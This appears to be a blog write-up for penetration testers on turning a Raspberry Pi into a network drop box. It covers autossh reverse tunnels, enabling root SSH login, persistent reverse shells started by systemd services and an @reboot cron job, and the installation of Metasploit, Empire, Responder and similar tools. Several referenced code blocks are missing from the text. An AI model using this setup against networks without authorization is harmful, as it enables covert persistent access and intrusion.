Im leaving this here for a bit as I have not finished my other post but there is a much better way to do this which I use in red teams
I have created a script to automate all of this so this writeup is obsolete
First download and install Raspbian onto a SD card. there are loads of guides on how to do this.
I chose the light version which is perfect for making something speedy and I did not want it bloated with a lot of GUI stuff I did not want.
Win32 Disk imager is my preference as you can write over the entire SD card in one hit. Other Linux methods work just as well.
Insert the card, boot the pi and login with the username and password pi:raspbian
Change your password to something strong
sudo su (Become root)
passwd pi #set a strong password
passwd root #set a stong password
Now make sure you have ssh listening on your “attacker machine”
service ssh start
apt-get install openssh-server
# Regenerate the keys
dpkg -i openssh-server
Now you want to enable root login and have it ready every time it boots
ifconfig #to get your current IP
Select “5 Interfacing Options”
Then select ssh and enable it
Reboot the pi and try to login with your current ip.
Now that is working you need configure autossh
sudo su (Become root)
apt-get install autossh
useradd -m -s /sbin/nologin piusername
su – piusername -s /bin/bash
(Dont set a passphrase)
Now you need to create a user on your attacker machine for the pi to connect to.
useradd -m -s /bin/bash localusername
passwd localusername #set a very secure password as this will be open
Ensure you can login via your localhost.
Once that is verified move to the next step.
You need to copy over your ssh id to the remote server.
The ideal way to do this is to add it manually (copy and paste via ssh) although you can use the following:
Seeing as I was logged in via ssh I copied and pasted my id into a newly created authorized_keys file in /root/.ssh/
Make sure the permissions are all good.
chmod 600 /root/.ssh/*
Also ensure you allow root login.
echo “PermitRootLogin yes” >> /etc/ssh/sshd_config
There are several ways to create a startup file but I prefer to create a new systemd service as this has proven the most reliable.us
Steps to do that are as follows:
Create the following file
Now run the following commands
systemctl start autossh.service
systemctl status autossh.service
If you see this then you are good to go to the next step
Now enter the following command on your attacker machine.
ssh email@example.com -p 2222
If you can login then you are good to go. The machine will create a reverse tunnel whenever the autossh.service is started.
The last command you need to run to enable autossh on boot is:
systemctl enable autossh.service
Providing all the above worked without errors (There may be some depending on your configuration) reboot the machine and wait until you can ssh into the pi.
ssh firstname.lastname@example.org -p 2222
Once that is up and running you can start installing your tools, most of these are easy and work out of the box some are more difficult and I have detailed them below.
If you want a list of the basic tools I installed they are below:
apt-get install nmap wifite cutycapt screen locate
This was a bit of a nightmare as it will not work out of the box with this old raspberry pi, if it does not work for you be prepared to google your errors.
You need to install a load of tools and dependencies to get this up and running so I am already missing Kali but I will press ahead and get it working as I want this on the machine.
I managed to strip it down to the following
git clone https://github.com/rapid7/metasploit-framework.git
Now install some stuff
apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev git-core postgresql curl ruby nmap gem bundler
Most of these will already be installed
Before you can move on and install metasploit you need a few other bits, the following worked for me (you may need to tweak it)
apt-get install libsqlite3-dev
# if that does not work
gem install sqlite3 -v ‘1.3.13’
The next command takes ages and appears to do nothing (it warns you) but give it time.
gem install nokogiri -v ‘1.8.2’
After about 9 months you should see this:
Once they are installed we can “try”
You will get a warning about running bundler as root and a recommendation to install bundler via gem but I carried on regardless as this is just a test.
At this point the pi became unresponsive so its a good time to test out the autossh viability.
I pulled the powercable to give it a hard reset and plugged it in and within 40 seconds I had a ssh connection.
Considering the last response from bundler I decided to update it.
gem install bundler
This took a while on a fresh boot but we are nearly there.
Now it is actually working
This installed and seemed to work so lets see how the raspberry pi handles msfconsole.
Wow it was faster than I thought and took about 45 seconds
Lets test it out with a rev shell, it looks like it is working so far.
Create one with msfvenom on your attacker machine
Set up a listener
Execute the shell
Watch your listener for a shell
Looks like the latest exploits are installed as well so we can move on to the next tool.
Modify .bashrc with the following command to make it run in any dir. or you can add it to your bin.
(FYI I tweaked my .bashrc at this point to make my console stand out)
echo alias “msfconsole=’/opt/metasploit-framework/msfconsole'” >> ~/.bashrc
Test it works
Also add msfvenom to your .bashrc for easy shells
echo alias “msfvenom=’/opt/metasploit-framework/msfvenom'” >> ~/.bashrc
Creating other methods of access.
Now we want to add a few other shells incase we are unable to get autossh out of the firewall to make sure you can access the machine.
We will use python as the arm architecture does not play well with msfvenom
Reverse HTTPs python shell (Port 80):
Reverse HTTPS python shell:
Reverse python HTTPS shell via port 53
Now create the following file on your attacker machine called meterpreter.rc.
Run the .rc file with the below command:
msfconsole -q -r meterpreter.rc
Check your shells work
These are pretty handy if you have some local tools you want to run against the host or if you want to pivot with metasploit.
Now create three services in /etc/systemd/system with the following contents.
Start each of the services to make sure they work.
Enable your services to start at boot.
Exit meterpreter and start your handlers from scratch.
msfconsole -q -r meterpreter.rc
Reboot the pi and you should see three shells come back.
Now we have four ways for our pi to call back to us.
Another method which may be easier is to create a cronjob.
Create the following file Shells.sh
Make the file executable
chmod +x Shells.sh
Open crontab with
Add the following entry:
@reboot /bin/bash /root/Shells.sh
Exit and save the pi and reboot.
Open your listener again and after a while you should see your shells come back.
git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
Not sure why you would not have this on your local machine but it always helps
Make searchsploit executable and test it.
It works so add it to your .bashrc file
Be careful not to overwrite it
echo alias “searchsploit=’/opt/exploit-database/searchsploit'” >> ~/.bashrc
Type the following:
Check it works outside of the exploitdb folder
So Raspbian comes with python installed.
First we will install pip (Easy python installs)
apt-get install python-pip
You can add your tools via pip as you need them but just for a demo. (this was already installed)
python -m SimpleHTTPServer 81
Lets see what we can host internally
Ok happy with that, not my best fake website but you get the idea.
git clone https://github.com/samratashok/nishang.git
Best powershell reverse shell I have found so far which you can host via python.
This combined with a bash bunny is really handy.
Another amazing powershell tool you want on this machine
git clone https://github.com/trustedsec/unicorn.git
git clone https://github.com/SpiderLabs/Responder.git
Very good tool
Another tool to add which will be useful for internal tests.
git clone https://github.com/adaptivethreat/Empire.git
apt-get install python-m2crypto
pip install pyminifier
Once installed you should see this:
Social Engineer Toolkit
Another great tool most of the dependencies are already installed
git clone https://github.com/trustedsec/social-engineer-toolkit.git
python setup.py install
Setup should end like this:
Now set is installed: